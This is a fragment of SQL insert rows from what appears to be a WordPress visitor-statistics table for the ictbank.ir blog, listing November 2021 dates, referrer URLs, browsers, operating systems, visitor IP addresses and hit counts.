(14840,'2021-11-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(14841,'2021-11-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.46.201.71','000',0,2,0),
(14842,'2021-11-05','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','107.172.32.60','000',0,21,0),
(14843,'2021-11-05','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','144.168.148.84','000',0,2,0),
(14844,'2021-11-05','https://www.bing.com','Chrome','Windows','6.1',NULL,NULL,'','165.227.115.229','000',0,3,0),
(14845,'2021-11-05','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.165','000',0,1,0),
(14846,'2021-11-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','84.17.42.25','000',0,1,0),
(14847,'2021-11-05','http://design-arena.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','156.146.63.145','000',0,2,0),
(14848,'2021-11-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(14849,'2021-11-05','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.170','000',0,1,0),
(14850,'2021-11-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,20,0),
(14851,'2021-11-06','http://ictbank.ir/blog/','Chrome','Windows','6.3',NULL,NULL,'','156.146.63.145','000',0,1,0),
(14852,'2021-11-06','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(14853,'2021-11-06','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.53.90.24','000',0,2,0),
(14854,'2021-11-06','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.169','000',0,2,0),
(14855,'2021-11-06','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','190.123.219.48','000',0,11,0),
(14856,'2021-11-06','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','85.208.115.183','000',0,2,0),
(14857,'2021-11-06','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.167','000',0,1,0),
(14858,'2021-11-06','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','27.115.124.36','000',0,1,0),
(14859,'2021-11-06','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','27.115.124.74','000',0,1,0),
(14860,'2021-11-06','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','27.115.124.99','000',0,1,0),
(14861,'2021-11-06','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.172','000',0,2,0),
(14862,'2021-11-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.74.221','000',0,2,0),
(14863,'2021-11-06','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.180.231.247','000',0,2,0),
(14864,'2021-11-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','171.97.43.82','000',0,4,0),
(14865,'2021-11-06','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.166','000',0,1,0),
(14866,'2021-11-06','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.239','000',0,1,0),
(14867,'2021-11-06','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.28','000',0,1,0),
(14868,'2021-11-06','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(14869,'2021-11-06','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.230.150','000',0,1,0),
(14870,'2021-11-06','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.91.23.98','000',0,47,0),
(14871,'2021-11-06','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.162.200.4','000',0,2,0),
(14872,'2021-11-06','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','188.143.232.14','000',0,10,0),
(14873,'2021-11-06','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.67.65','000',0,1,0),
(14874,'2021-11-06','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.165','000',0,1,0),
(14875,'2021-11-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.47.202','000',0,1,0),
(14876,'2021-11-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.148.49','000',0,1,0),
(14877,'2021-11-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(14878,'2021-11-06','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(14879,'2021-11-06','http://ictbank.ir/blog/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','Chrome','Windows','6.3',NULL,NULL,'','185.7.145.88','000',0,4,0),
(14880,'2021-11-06','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.164','000',0,1,0),
(14881,'2021-11-06','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','104.227.195.204','000',0,21,0),
(14882,'2021-11-06','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','107.173.113.120','000',0,2,0),
(14883,'2021-11-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.46.110.92','000',0,1,0),
(14884,'2021-11-07','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.170','000',0,2,0),
(14885,'2021-11-07','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','190.123.219.23','000',0,11,0),
(14886,'2021-11-07','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','50.3.89.10','000',0,2,0),
(14887,'2021-11-07','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.166','000',0,2,0),
(14888,'2021-11-07','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.10','000',0,3,0),
(14889,'2021-11-07','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.26','000',0,1,0),
(14890,'2021-11-07','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.169','000',0,1,0),
(14891,'2021-11-07','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','177.234.143.69','000',0,12,0),
(14892,'2021-11-07','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','154.16.88.136','000',0,2,0),
(14893,'2021-11-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','185.53.90.24','000',0,2,0),
(14894,'2021-11-07','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.163','000',0,1,0),
(14895,'2021-11-07','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.22','000',0,1,0),
(14896,'2021-11-07','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.216','000',0,2,0),
(14897,'2021-11-07','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.21','000',0,8,0),
(14898,'2021-11-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.185.103.102','000',0,2,0),
(14899,'2021-11-07','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.173','000',0,1,0),
(14900,'2021-11-07','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.13','000',0,2,0),
(14901,'2021-11-07','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','212.102.33.66','000',0,3,0),
(14902,'2021-11-07','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,10,0),
(14903,'2021-11-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(14904,'2021-11-07','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.167','000',0,1,0),
(14905,'2021-11-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.166.73.18','000',0,1,0),
(14906,'2021-11-07','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(14907,'2021-11-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','209.208.97.172','000',0,2,0),
(14908,'2021-11-07','http://srchs.com','Chrome','Windows','6.1',NULL,NULL,'','191.96.185.61','000',0,2,0),
(14909,'2021-11-07','http://2tech.net/blog','Firefox','Linux','Unknown',NULL,NULL,'','195.37.190.88','000',0,2,0),
(14910,'2021-11-07','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(14911,'2021-11-07','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.72','000',0,10,0),
(14912,'2021-11-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(14913,'2021-11-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.232.88.121','000',0,1,0),
(14914,'2021-11-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(14915,'2021-11-07','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.47.202','000',0,1,0),
(14916,'2021-11-07','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.164','000',0,1,0),
(14917,'2021-11-07','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,1,0),
(14918,'2021-11-07','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.229.113.138','000',0,3,0),
(14919,'2021-11-07','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','119.61.0.138','000',0,2,0),
(14920,'2021-11-07','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','199.187.211.12','000',0,5,0),
(14921,'2021-11-07','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.184','000',0,1,0),
(14922,'2021-11-07','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.85','000',0,5,0),
(14923,'2021-11-07','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.165','000',0,1,0),
(14924,'2021-11-08','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.90.142','000',0,1,0),
(14925,'2021-11-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','135.181.199.252','000',0,2,0),
(14926,'2021-11-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(14927,'2021-11-08','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,10,0),
(14928,'2021-11-08','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.172','000',0,1,0),
(14929,'2021-11-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.191.235.19','000',0,2,0),
(14930,'2021-11-08','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.185.4.16','000',0,1,0),
(14931,'2021-11-08','https://www.bing.com/','Chrome','Windows','10.0',NULL,NULL,'','88.12.116.152','000',0,1,0),
(14932,'2021-11-08','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.237.125','000',0,1,0),
(14933,'2021-11-08','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(14934,'2021-11-08','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','167.99.48.249','000',0,1,0),
(14935,'2021-11-08','http://ictbank.ir/blog','Chrome','OS X','10.14.4',NULL,NULL,'','45.88.3.179','000',0,7,0),
(14936,'2021-11-08','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','120.92.147.164','000',0,5,0),
(14937,'2021-11-08','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.166','000',0,1,0),
(14938,'2021-11-08','http://ictbank.ir/blog','Chrome','Android','6.0',NULL,NULL,'','121.5.109.55','000',0,1,0),
(14939,'2021-11-08','http://ictbank.ir/blog','Chrome','Android','6.0',NULL,NULL,'','42.193.45.103','000',0,2,0),
(14940,'2021-11-08','http://82.102.9.14:80/blog','Chrome','Android','6.0',NULL,NULL,'','81.69.191.124','000',0,2,0),
(14941,'2021-11-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(14942,'2021-11-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(14943,'2021-11-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','68.183.12.129','000',0,1,0),
(14944,'2021-11-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(14945,'2021-11-08','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(14946,'2021-11-08','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,3,0),
(14947,'2021-11-08','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','94.130.167.248','000',0,1,0),
(14948,'2021-11-08','http://82.102.9.14/blog','Chrome','Windows','6.1',NULL,NULL,'','87.120.36.76','000',0,2,0),
(14949,'2021-11-09','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(14950,'2021-11-09','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','78.39.6.46','000',0,1,0),
(14951,'2021-11-09','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','54.225.39.166','000',0,2,0),
(14952,'2021-11-09','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.172','000',0,1,0),
(14953,'2021-11-09','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.91.23.133','000',0,47,0),
(14954,'2021-11-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','49.12.126.16','000',0,1,0),
(14955,'2021-11-09','http://ictbank.ir/blog','Chrome','OS X','10.14.4',NULL,NULL,'','45.88.3.179','000',0,3,0),
(14956,'2021-11-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.82.2','000',0,2,0),
(14957,'2021-11-09','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.9','000',0,3,0),
(14958,'2021-11-09','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.10','000',0,31,0),
(14959,'2021-11-09','http://mail.design-arena.ir/blog','Chrome','Android','8.0',NULL,NULL,'','61.135.15.154','000',0,2,0),
(14960,'2021-11-09','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','185.218.124.139','000',0,4,0),
(14961,'2021-11-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(14962,'2021-11-09','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.186.223.140','000',0,1,0),
(14963,'2021-11-09','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(14964,'2021-11-09','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.13','000',0,33,0),
(14965,'2021-11-09','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','6.1',NULL,NULL,'','46.161.11.64','000',0,4,0),
(14966,'2021-11-09','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','203.106.115.148','000',0,1,0),
(14967,'2021-11-09','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.164','000',0,1,0),
(14968,'2021-11-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(14969,'2021-11-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.50.185','000',0,1,0),
(14970,'2021-11-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(14971,'2021-11-09','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(14972,'2021-11-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.46.201.71','000',0,2,0),
(14973,'2021-11-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.22','000',0,2,0),
(14974,'2021-11-09','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','85.233.160.31','000',0,1,0),
(14975,'2021-11-09','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.9.73.67','000',0,2,0),
(14976,'2021-11-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(14977,'2021-11-10','http://82.102.9.14/blog','Chrome','Android','9',NULL,NULL,'','87.120.36.76','000',0,2,0),
(14978,'2021-11-10','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.226','000',0,1,0),
(14979,'2021-11-10','http://design-arena.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.174','000',0,1,0),
(14980,'2021-11-10','http://ictbank.ir/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.226.4','000',0,2,0),
(14981,'2021-11-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(14982,'2021-11-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(14983,'2021-11-10','http://ictbank.ir/blog/index.php/2020/03/24/one-way-to-prevent-ddos-attacks-in-wordpress/','Chrome','Windows','6.1',NULL,NULL,'','185.7.145.88','000',0,4,0),
(14984,'2021-11-10','http://design-arena.ir/blog','Chrome','Android','10.0',NULL,NULL,'','124.126.78.192','000',0,2,0),
(14985,'2021-11-10','http://ictbank.ir/blog','Chrome','OS X','10.14.4',NULL,NULL,'','45.88.3.179','000',0,10,0),
(14986,'2021-11-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.11','000',0,1,0),
(14987,'2021-11-10','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','3.19.70.121','000',0,1,0),
(14988,'2021-11-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.210.243.91','000',0,2,0),
(14989,'2021-11-10','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.167','000',0,1,0),
(14990,'2021-11-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(14991,'2021-11-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','45.79.176.87','000',0,1,0),
(14992,'2021-11-10','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','23.100.232.233','000',0,2,0),
(14993,'2021-11-10','https://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','151.234.117.174','000',0,1,0),
(14994,'2021-11-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','139.162.215.70','000',0,2,0),
(14995,'2021-11-10','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','115.135.27.171','000',0,1,0),
(14996,'2021-11-10','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.188.164.24','000',0,1,0),
(14997,'2021-11-10','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','192.53.170.163','000',0,2,0),
(14998,'2021-11-10','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','201.6.29.138','000',0,4,0),
(14999,'2021-11-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.232.88.121','000',0,1,0),
(15000,'2021-11-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(15001,'2021-11-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(15002,'2021-11-10','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(15003,'2021-11-10','http://example.com/blog','Unknown','Unknown','Unknown',NULL,NULL,'','207.148.66.23','000',0,1,0),
(15004,'2021-11-10','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','209.141.33.65','000',0,1,0),
(15005,'2021-11-10','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','209.141.41.193','000',0,1,0),
(15006,'2021-11-11','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','208.100.26.232','000',0,2,0),
(15007,'2021-11-11','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(15008,'2021-11-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','161.35.225.67','000',0,5,0),
(15009,'2021-11-11','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,10,0),
(15010,'2021-11-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','159.223.168.198','000',0,2,0),
(15011,'2021-11-11','http://ictbank.ir/blog','Chrome','OS X','10.14.4',NULL,NULL,'','45.88.3.179','000',0,3,0),
(15012,'2021-11-11','http://82.102.9.14:80/blog','Chrome','OS X','10.14.6',NULL,NULL,'','119.96.133.192','000',0,4,0),
(15013,'2021-11-11','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.228.53','000',0,1,0),
(15014,'2021-11-11','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(15015,'2021-11-11','http://ciri.com/blog','Firefox','Linux','Unknown',NULL,NULL,'','195.37.190.88','000',0,2,0),
(15016,'2021-11-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.61.69','000',0,2,0),
(15017,'2021-11-11','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','2.182.162.121','000',0,1,0),
(15018,'2021-11-11','http://ictbank.ir/blog','Samsung Internet','Android','11',NULL,NULL,'','2.177.44.33','000',0,1,0),
(15019,'2021-11-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.24.179.16','000',0,2,0),
(15020,'2021-11-11','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.166.99.7','000',0,1,0),
(15021,'2021-11-11','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','88.80.185.49','000',0,2,0),
(15022,'2021-11-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.60.133','000',0,1,0),
(15023,'2021-11-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.32.148.49','000',0,1,0),
(15024,'2021-11-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(15025,'2021-11-11','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(15026,'2021-11-11','http://ictbank.ir/blog','Chrome','Android','6.0',NULL,NULL,'','49.234.43.244','000',0,1,0),
(15027,'2021-11-11','http://82.102.9.14:80/blog','Chrome','Android','6.0',NULL,NULL,'','42.192.17.155','000',0,2,0),
(15028,'2021-11-11','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','184.147.54.122','000',0,1,0),
(15029,'2021-11-11','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','23.100.232.233','000',0,2,0),
(15030,'2021-11-12','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,2,0),
(15031,'2021-11-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(15032,'2021-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.89.87.153','000',0,1,0),
(15033,'2021-11-12','http://ictbank.ir/blog','Chrome','Android','6.0',NULL,NULL,'','121.5.226.36','000',0,3,0),
(15034,'2021-11-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,10,0),
(15035,'2021-11-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.20','000',0,2,0),
(15036,'2021-11-12','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(15037,'2021-11-12','http://ictbank.ir/blog','Firefox Mobile','Android','11',NULL,NULL,'','203.86.199.139','000',0,1,0),
(15038,'2021-11-12','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','52.87.203.111','000',0,1,0),
(15039,'2021-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.200.196.56','000',0,2,0),
(15040,'2021-11-12','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','151.234.141.154','000',0,4,0),
(15041,'2021-11-12','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.40','000',0,2,0),
(15042,'2021-11-12','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.162','000',0,1,0),
(15043,'2021-11-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.9','000',0,2,0),
(15044,'2021-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','138.128.118.130','000',0,2,0),
(15045,'2021-11-12','http://design-arena.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.120.46','000',0,1,0),
(15046,'2021-11-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(15047,'2021-11-12','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.209.65.29','000',0,1,0),
(15048,'2021-11-12','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.9','000',0,4,0),
(15049,'2021-11-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(15050,'2021-11-12','http://design-arena.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.89.228.207','000',0,2,0),
(15051,'2021-11-12','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(15052,'2021-11-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.6.41','000',0,1,0),
(15053,'2021-11-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,2,0),
(15054,'2021-11-12','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(15055,'2021-11-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','172.105.189.111','000',0,2,0),
(15056,'2021-11-12','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(15057,'2021-11-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','50.87.144.74','000',0,1,0),
(15058,'2021-11-12','http://82.102.9.14/blog','Chrome','Android','7.0',NULL,NULL,'','61.135.15.165','000',0,1,0),
(15059,'2021-11-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','157.230.109.157','000',0,1,0),
(15060,'2021-11-12','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.162.103.109','000',0,2,0),
(15061,'2021-11-13','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','44.193.74.139','000',0,1,0),
(15062,'2021-11-13','http://82.102.9.14/blog','Chrome','Android','6.0',NULL,NULL,'','42.193.16.135','000',0,6,0),
(15063,'2021-11-13','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.55.242','000',0,1,0),
(15064,'2021-11-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.161.17.135','000',0,2,0),
(15065,'2021-11-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.232.55','000',0,1,0),
